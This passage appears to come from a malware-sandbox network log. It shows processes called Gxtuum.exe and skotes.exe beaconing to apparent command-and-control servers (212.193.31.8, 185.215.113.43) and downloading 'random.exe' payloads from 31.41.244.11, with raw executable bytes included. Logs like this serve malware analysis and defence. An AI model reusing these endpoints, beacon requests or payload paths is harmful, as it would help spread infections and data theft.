Dec 22, 2024 02:17:14.117522955 CET	1120	IN	Data Raw: 64 fc c5 9e 3a eb d0 91 bc a8 2c 1a f1 35 3f fc d0 3c 43 05 c5 6c 44 c6 42 a3 02 67 38 3a 1c af 8b c8 25 2a 55 e2 01 91 9a f6 d1 85 63 78 21 1f 6e cb 85 d9 57 dd cd ea 60 71 91 6f c5 5d 85 72 88 de fd ae 4b 8e 67 51 1c 1e 8d f9 4d 22 37 1f c7 d6 Data Ascii: d:,5?<ClDBg8:%Ucx!nW`qo]rKgQM"7FmR+O\|P~[t;qG~h[&IKyap}y$o2L2J>n41_T}[g'HTx.1x}SW\cp'^X}U'J\^]
Dec 22, 2024 02:17:14.117628098 CET	1236	IN	Data Raw: 09 22 12 48 b3 60 1e a4 4d 5f 8b db b9 f1 68 61 ac 48 35 f5 a7 dd ae 36 5a 9b 41 a9 00 bb 29 ca 4c 97 fd 3c e7 05 37 3e dd 8a 63 b1 5e cd bd a7 d6 70 24 9c c7 76 4f 89 be 97 b5 72 98 90 3d 51 ef 86 c1 10 08 bc d4 fd e6 1c a2 fc c3 d2 30 a7 88 7c Data Ascii: "H`M_haH56ZA)L<7>c^p$vOr=Q0\|vu@j>4Mt0<nEJ?)j{H]N%k_&&hWa0n_IIsD.2\|8%sAB}%@nX*YW1VM8g<^hk
Dec 22, 2024 02:17:14.117664099 CET	1236	IN	Data Raw: 54 22 63 da e7 cd 1e d9 a8 0c 76 cf 30 11 d4 97 89 4e 38 d6 cd 59 bb 3f 12 2e 17 5e 1e bd 43 2a 82 7c c8 74 1a 4d 14 78 ea f2 4f 8c 3f 14 03 fc e4 74 0c 7a 56 e5 f2 28 ba 85 f0 e1 74 73 c7 3f 21 4a 68 9f d5 6a 6c 40 1f 07 32 ae 16 d1 02 13 9c 16 Data Ascii: T"cv0N8Y?.^C*\|tMxO?tzV(ts?!Jhjl@2HZ:iVmT]\|o~3Z?%&D`$92~yb\PN+apFb$bioDvEN\|1Q4o'pFT}99_%ym>5vR+],'
Dec 22, 2024 02:17:14.118302107 CET	1236	IN	Data Raw: 1c 2e 1e f7 ce db 92 c5 55 97 7b 26 34 56 37 81 8f 35 cf 4c 75 c6 fc db d1 ec 41 ed 39 87 5a a0 7d 97 8b 54 cd 1a 05 ab 71 97 f8 0c c8 5a aa da 92 91 21 1b a9 fd ac 21 7a 5a ef 95 78 7b 80 bb d6 8c fd 65 c2 69 9d 76 52 87 9f dd 49 de 3f 0a b3 91 Data Ascii: .U{&4V75LuA9Z}TqZ!!zZx{eivRI?Uh3z*e~Lb`_~(/88n?:\| H'\;t^\|D'e#d]WLc'NX\|5d2V_mT{5-zYe;Llu<~zns:
Dec 22, 2024 02:17:14.118336916 CET	1236	IN	Data Raw: 08 54 61 7b 8e 65 70 64 5b fe 4e 56 3b 88 7c 42 e2 7b fa 67 9b 01 c2 7a 35 82 37 3b 69 b2 6d 87 7b 33 f4 41 b9 bf 43 9f 88 88 fa 1c 49 5a db 2a 8d 79 d8 d4 06 73 a8 bb aa 42 de ba 3a 83 48 07 bd 30 d1 79 20 09 14 ce 00 a5 05 06 de 0d 70 d8 dd 3a Data Ascii: Ta{epd[NV;\|B{gz57;im{3ACIZysB:H0y p:&d8g[ycBxXC_omeejq;l:>\|kj5wQC76aF$eG-(*]cut}lRUmPZIi3aV0Lf6oqp4$
Dec 22, 2024 02:17:14.236839056 CET	1236	IN	Data Raw: 01 55 a1 5e 38 ca 88 47 0f 81 39 cc 01 ac f8 81 09 8b f6 f8 98 1b 96 a4 05 71 62 f3 dd c4 89 76 b2 c6 4d 0b f3 1f b3 37 dd 3b 29 2f 31 b9 99 be ae ac 57 a9 05 40 d1 42 09 aa d9 ea f2 49 e6 5e ee 2c 62 13 ae 22 d3 4a 85 95 30 33 5d 6d df dd 43 19 Data Ascii: U^8G9qbvM7;)/1W@BI^,b"J03]mCKdb\!w#Qk6>1D&DEz}A&?f0xRpA,6UfmPp%tO\G2"$,U%QDdmc;~:0Z-L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49945	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:12.638530970 CET	312	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Dec 22, 2024 02:17:13.974750042 CET	154	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:17:13 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49947	31.41.244.11	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:14.286479950 CET	62	OUT	GET /files/burpin1/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 22, 2024 02:17:15.390877008 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:17:15 GMT Content-Type: application/octet-stream Content-Length: 4438776 Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT Connection: keep-alive ETag: "675784f0-43baf8" Accept-Ranges: bytes Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ`@`!L!Require Windows$PEL?O_@D0O{C?l.text `.rdata;<@@.dataM@.rsrcO0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`\|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3
Dec 22, 2024 02:17:15.390959978 CET	1236	IN	Data Raw: c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 94 80 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 68 80 01 00 59 8b 46 04 89 3e 66 83 24 47 00 89 5e 08 5f 5e 5b c2 04 00 56 8b f1 Data Ascii: jZQ39FY~9F~fAfG@;F\|6hYF>f$G^_^[Vv\IY^oUQQAuVjjEP5A\|At>E;Ew6rE;Es,jPYYtlAj@ AEPjh5XAA3D$tlA
Dec 22, 2024 02:17:15.390985966 CET	1236	IN	Data Raw: 3b f3 74 06 8b 06 56 ff 50 08 33 c0 40 eb 25 e8 a7 fe ff ff 8d 4d e0 8b f8 e8 bb 0e 01 00 8b 06 56 ff 50 08 8b c7 eb 0c 3b f3 74 06 8b 06 56 ff 50 08 33 c0 5e 5f 5b c9 c3 56 8b f1 c7 46 04 60 c3 41 00 83 66 08 00 c7 06 34 a5 41 00 c7 46 04 24 a5 Data Ascii: ;tVP3@%MVP;tVP3^_[VF`Af4AF$AfNf$N(^Uh$AuYYtEP#UPQ3hAudYYu@]Vv({F$YtPQvzvYtVP^l$
Dec 22, 2024 02:17:15.391021013 CET	1236	IN	Data Raw: 7d c4 0f 84 d0 02 00 00 66 83 7d c4 08 0f 85 c5 02 00 00 ff 75 cc 8d 4d f0 e8 76 f8 ff ff 8d 45 f0 50 8d 46 10 50 8d 45 e4 50 8d 5e 28 e8 1f fc ff ff 83 c4 0c 50 8b cb e8 90 f8 ff ff ff 75 e4 e8 b6 76 01 00 39 7d 14 59 0f 85 6f 02 00 00 8b 46 0c Data Ascii: }f}uMvEPFPEP^(Puv9}YoFURjuf}f}PQ;EtMu{v}Y^f9}u~@-f}t jeVPMXuFvY,EF@FURjuPQ;Eu3f9}URjuF<F
Dec 22, 2024 02:17:15.391057014 CET	1236	IN	Data Raw: a2 41 00 8b f8 3b fe 74 33 56 6a 01 6a 01 57 ff 15 a4 a2 41 00 56 56 56 8d 45 e4 50 ff 15 a8 a2 41 00 8d 45 e4 50 ff 15 ac a2 41 00 6a 01 57 ff 15 b0 a2 41 00 57 ff 15 b4 a2 41 00 5f 5e c9 c3 53 ff 74 24 08 ff 15 94 a2 41 00 8b d8 85 db 75 02 5b Data Ascii: A;t3VjjWAVVVEPAEPAjWAWA_^St$Au[VW\|$Wt$A5AWSWS_3^@[UDSVWjpA5XAAPuuSuhuuSt&utWS\AWS`AtPdAz=Auo5h
Dec 22, 2024 02:17:15.391096115 CET	1236	IN	Data Raw: 59 8b 4d fc 41 51 50 89 45 f8 8d 45 98 50 ff d3 3b 45 fc 77 40 ff d7 85 c0 75 3a 8b 86 bc e0 41 00 85 c0 74 25 8b 7d f8 57 50 ff 15 2c a1 41 00 85 c0 74 13 ff b6 bc e0 41 00 e8 14 6d 01 00 89 be bc e0 41 00 eb 16 57 eb 0e 8b 45 f8 89 86 bc e0 41 Data Ascii: YMAQPEEP;Ew@u:At%}WP,AtAmAWEAulYuAAAA9t;AuS0AG3jZGQl=AYAu:%AjXPAhP4A~XP
Dec 22, 2024 02:17:15.391133070 CET	1236	IN	Data Raw: 20 a1 41 00 85 c0 74 37 8b 4d d4 33 c0 3b c8 77 2e 72 08 8b 45 d0 3b 45 08 73 24 6a 2b e8 70 fa ff ff 50 e8 86 6b 00 00 83 f8 01 59 59 74 09 83 0d c8 e9 41 00 ff eb ae 83 0d c8 e9 41 00 02 33 c0 40 c9 c3 ff 74 24 04 e8 8d ff ff ff 85 c0 59 75 01 Data Ascii: At7M3;w.rE;Es$j+pPkYYtAA3@t$Yujht$jAt$jYu%8AV3Wt$FFYW.t$6YY~_^D$V;F\|P^VWt$YWFt$AP
Dec 22, 2024 02:17:15.391422987 CET	1236	IN	Data Raw: e8 c0 e2 ff ff 66 83 24 46 00 59 89 45 f8 8d 45 f4 50 8b cf e8 64 e5 ff ff 56 e8 8c 63 01 00 59 5b 5f 5e c9 c3 55 8b ec b8 20 10 00 00 e8 cf 63 01 00 53 56 57 8b 7d 08 8b 07 33 db 53 53 53 53 57 ff 50 10 8b 45 14 ff 75 0c 8b 35 30 a1 41 00 89 58 Data Ascii: f$FYEEPdVcY[_^U cSVW}3SSSSWPEu50AXuEE3]]]}MQ+Q5QWPE;3E8]t=+E;w`uuubE:EtuMvGE+
Dec 22, 2024 02:17:15.391458035 CET	332	IN	Data Raw: 46 02 eb 22 8d 46 02 66 83 38 7b 75 02 8b f0 0f b7 06 50 8b cb e8 e8 e3 ff ff 03 f7 0f b7 06 66 85 c0 75 c6 8b c6 5f 5e 5b c3 8b 4c 24 04 56 6a 5c e8 25 f7 ff ff 8b 4c 24 08 6a 2f 8b f0 e8 18 f7 ff ff 3b c6 7e 02 8b f0 8b c6 5e c3 56 57 8b 7c 24 Data Ascii: F"Ff8{uPfu_^[L$Vj\%L$j/;~^VW\|$t$A~!FPPPt$Af$pw_^UtSVuWj@EPVAtIhAEPHAu6jV\|Au)EVPvjhAutu]
Dec 22, 2024 02:17:15.391494989 CET	1236	IN	Data Raw: ff 75 d0 ff 75 cc 68 04 08 00 50 68 84 a5 41 00 68 94 a6 41 00 53 ff 15 a0 a2 41 00 8b f8 3b fb 0f 84 7b ff ff ff 56 ff 15 b4 a2 41 00 8b 35 b8 a2 41 00 53 6a 22 68 59 04 00 00 57 ff d6 6a 0f ff 15 cc a2 41 00 50 53 68 43 04 00 00 57 ff d6 b8 e9 Data Ascii: uuhPhAhASA;{VA5ASj"hYWjAPShCWPEEPEP]uEPhaWu]u]YYUQSVW=(AjEPuuTCPECSuPu>Wf$GYF_^[Vj
Dec 22, 2024 02:17:15.510691881 CET	1236	IN	Data Raw: 01 eb 2b ff 75 10 ff 75 fc eb 06 ff 75 10 ff 75 f8 57 e8 5c f6 ff ff 83 c4 0c 8d 4d a4 8a d8 e8 b9 ef ff ff ff 75 e0 e8 8b 58 01 00 8a c3 59 5f 5e 5b c9 c3 55 8b ec 83 ec 18 53 56 57 8b 7d 08 57 ff 15 f4 a0 41 00 57 8d 4d e8 8b d8 89 45 fc e8 5f Data Ascii: +uuuuW\MuXY_^[USVW}WAWME_39uVMD_f=\}tf=/uft_K]"wf=/tf=\tNf$wWYtEPAWAuEPWYYt3WYuWjj_[

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49953	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:15.950953960 CET	160	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 22, 2024 02:17:17.276853085 CET	155	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:17:17 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49960	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:18.901438951 CET	312	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Dec 22, 2024 02:17:20.238950014 CET	154	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:17:20 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49967	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:22.024346113 CET	160	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 22, 2024 02:17:23.344799042 CET	155	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:17:23 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49974	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:25.300949097 CET	312	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Dec 22, 2024 02:17:26.611053944 CET	154	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:17:26 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49978	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:25.642775059 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 39 38 30 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019807001&unit=246122658369
Dec 22, 2024 02:17:26.991192102 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:17:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49980	31.41.244.11	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:27.127130032 CET	62	OUT	GET /files/unique2/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 22, 2024 02:17:28.444703102 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:17:28 GMT Content-Type: application/octet-stream Content-Length: 1959936 Last-Modified: Sun, 22 Dec 2024 00:12:20 GMT Connection: keep-alive ETag: "67675964-1de800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 97 69 b8 cb d3 08 d6 98 d3 08 d6 98 d3 08 d6 98 6e 47 40 98 d2 08 d6 98 cd 5a 52 98 ce 08 d6 98 cd 5a 43 98 c7 08 d6 98 cd 5a 55 98 b8 08 d6 98 f4 ce ad 98 d6 08 d6 98 d3 08 d7 98 a0 08 d6 98 cd 5a 5c 98 d2 08 d6 98 cd 5a 42 98 d2 08 d6 98 cd 5a 47 98 d2 08 d6 98 52 69 63 68 d3 08 d6 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a8 2c b1 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 da 02 00 00 40 01 00 00 00 00 00 00 30 86 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 60 86 00 00 04 00 00 c5 0a 1e 00 02 00 00 80 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$inG@ZRZCZUZ\ZBZGRichPEL,e@0@`[Ao@ @N@.rsrc@p^@.idata A@ )A@tsdsdsrb0k@qtylzonp @.taggant00"@
Dec 22, 2024 02:17:28.444756031 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:17:28.444791079 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:17:28.444920063 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:17:28.444950104 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:17:28.444987059 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: mDV^it`ld
Dec 22, 2024 02:17:28.445235968 CET	1236	IN	Data Raw: a9 d3 24 d0 ac a4 b9 b8 10 e8 a5 82 63 90 65 fa 8b 84 cd ae 5a cb ae ca e7 90 67 ed bc 43 d8 36 3a 81 8e d4 bf 6b 49 c5 e2 ae 7e 1a 82 e4 76 01 d5 03 4f e6 f3 c4 b2 85 e4 86 ae 5a a4 78 17 5f d9 7f 55 56 c7 16 9b 10 0a 39 43 0e 5c 7b ce ee 8b 79 Data Ascii: $ceZgC6:kI~vOZx_UV9C\{y.rj'9x`je~xqt EW8L: yzYyjVzF9/?G/>ojCveZ0t!~!c?<~5jeha3s
Dec 22, 2024 02:17:28.445292950 CET	1236	IN	Data Raw: ec 39 8a 25 e5 6d 7e be e7 03 fc 21 a3 f3 fe a3 59 b6 9a 01 6e 40 b4 5f 80 3b b7 62 9c 44 65 a7 69 64 5f 19 b8 a0 87 2b 4c 8d e5 d8 e7 9b 92 98 06 c8 83 0e 83 f8 c4 d6 ee 6d 1d 77 8e b8 b2 20 02 9b 03 43 ee c7 b1 f5 5c 7e ae 97 8a d7 7a d6 fd 95 Data Ascii: 9%m~!Yn@_;bDeid_+Lmw C\~zaIALUdv\|rz#_,>.1eoli\o>bPVhz2#QSxDg~;5{N*Oi5&V,\ D2Dw.s
Dec 22, 2024 02:17:28.445329905 CET	1236	IN	Data Raw: a6 c4 60 80 ac 34 27 eb 51 88 e0 01 c3 c9 42 84 1c ed 8f e2 dd 6f 05 77 1d 8e 20 0f 32 20 cb 24 07 f8 2b 0c 2a c9 06 df 63 29 a7 1f 6b ef ca b7 0f 05 f5 27 b8 d1 89 7b c6 ee 1d c0 22 c3 85 24 d4 cb 4f 29 7c 9c 04 73 da f2 62 7e 69 bb 62 ff 1f fb Data Ascii: `4'QBow 2 $+*c)k'{"$O)\|sb~ib&'/$N~j>b0lN)o<coi"[e}=OXvJ &X^g.[>V^V\|>A{u@#LiBClvq}[(jrkds&
Dec 22, 2024 02:17:28.445600033 CET	1120	IN	Data Raw: ea 40 9a 23 66 97 39 40 af 90 fd 60 ef be 38 13 6d d8 88 14 2f 86 aa ac e7 64 02 c7 3b 0b 75 42 12 55 84 eb fa ce e7 fb 6e 80 45 d9 ee e4 6e 20 34 8d 80 68 72 64 93 ab 6a bb f8 57 e7 65 70 d7 c2 f8 ea 0c ff 83 53 35 d3 89 aa 1b 96 3b 2a f7 5f 0c Data Ascii: @#f9@`8m/d;uBUnEn 4hrdjWepS5;*_(L^(dwy9gn/(N`kQ8=^vs$r'GdoGw/4lJdEre.asj2HZG`"L{Yds`.J
Dec 22, 2024 02:17:28.564347982 CET	1236	IN	Data Raw: bb 34 7e 24 f6 b4 83 32 d5 b6 46 13 6a 7f 5e 12 60 3b 55 d2 11 40 f7 29 d1 ef 50 a1 e8 4e 47 17 9c 4c c3 93 45 40 a6 26 64 d4 8a 3b 6d 73 a6 1b 55 cc 6d 6c 92 7e 9a 77 3f 02 27 20 4e a3 bb 8e da 64 38 fd 43 39 fb 55 e9 bf 26 7a e6 e3 0f de df fd Data Ascii: 4~$2Fj^`;U@)PNGLE@&d;msUml~w?' Nd8C9U&zo"<23Arg&J\ 4l )rdN^OQ,Jrh}rpJ0ubw\)E;bZz2\FCTFT0'liQpY'jgWXH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49985	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:28.369966030 CET	160	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 22, 2024 02:17:29.861915112 CET	155	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:17:29 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49991	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
